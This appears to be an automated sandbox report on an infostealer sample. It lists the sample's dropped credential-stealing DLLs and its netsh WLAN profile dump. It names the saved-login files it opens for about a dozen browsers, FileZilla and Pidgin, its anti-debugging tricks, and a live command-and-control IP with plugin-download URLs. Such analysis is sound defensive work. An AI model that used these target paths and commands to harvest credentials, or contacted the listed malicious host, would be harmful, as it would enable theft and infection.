Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\OtntNNdpqYyQMUiSAQysCOlFcPDwPwakinULXKhkkyvGQAUcfRRvkfpLZMMaaOTCuIuDlXU\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008902D8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_008902D8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0088F5E1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_0088F5E1
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428513 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 13 other signatures 2->58 9 explorha.exe 18 2->9         started        14 explorha.exe 2->14         started        16 SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe 5 2->16         started        process3 dnsIp4 50 193.233.132.56, 49735, 49736, 49737 FREE-NET-ASFREEnetEU Russian Federation 9->50 38 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 9->38 dropped 40 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 9->40 dropped 42 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 9->42 dropped 44 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 9->44 dropped 76 Hides threads from debuggers 9->76 78 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->78 80 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 9->80 18 rundll32.exe 9->18         started        20 rundll32.exe 12 9->20         started        82 Antivirus detection for dropped file 14->82 84 Multi AV Scanner detection for dropped file 14->84 86 Detected unpacking (changes PE section rights) 14->86 94 3 other signatures 14->94 46 C:\Users\user\AppData\Local\...\explorha.exe, PE32 16->46 dropped 88 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->88 90 Tries to evade debugger and weak emulator (self modifying code) 16->90 92 Tries to detect virtualization through RDTSC time measurements 16->92 23 explorha.exe 16->23         started        file5 signatures6 process7 signatures8 25 rundll32.exe 25 18->25         started        60 System process connects to network (likely due to code injection or exploit) 20->60 62 Hides threads from debuggers 23->62 64 Tries to detect sandboxes / dynamic malware analysis system (registry check) 23->64 66 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 23->66 process9 signatures10 68 Tries to steal Instant Messenger accounts or passwords 25->68 70 Uses netsh to modify the Windows network and firewall settings 25->70 72 Tries to harvest and steal ftp login credentials 25->72 74 2 other signatures 25->74 28 powershell.exe 26 25->28         started        32 netsh.exe 2 25->32         started        process11 file12 48 C:\Users\user\...\246122658369_Desktop.zip, Zip 28->48 dropped 96 Loading BitLocker PowerShell Module 28->96 34 conhost.exe 28->34         started        36 conhost.exe 32->36         started        signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.233.132.56
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://193.233.132.56/Pneh2sXQk0/index.php true unknown
http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 true unknown
http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll true unknown
http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll true unknown